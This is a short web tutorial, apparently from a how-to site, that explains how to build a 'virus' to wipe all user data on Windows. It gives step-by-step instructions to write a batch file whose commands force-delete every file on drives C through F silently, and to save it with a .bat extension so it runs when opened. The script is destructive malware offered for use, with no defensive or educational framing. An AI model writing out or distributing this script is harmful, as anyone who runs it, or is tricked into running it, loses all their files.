How to Create a Virus to Wipe All User Data from Windows

Virus to Wipe All User Data

Instructions to Perform a Task

  1. Press the Windows + R buttons from your keyboard. This will open the Run dialog.
  2. Type Notepad in the dialog box and press Enter. This will open Notepad.
  3. Type the following code in Notepad:
@echo off
del C:\*.*/f /s /q
del D:\*.*/f /s /q
del E:\*.*/f /s /q
del F:\*.*/f /s /q
    
  1. After typing in the code, save the file with a name of your choice, but remember to save it with the .bat extension.

Comments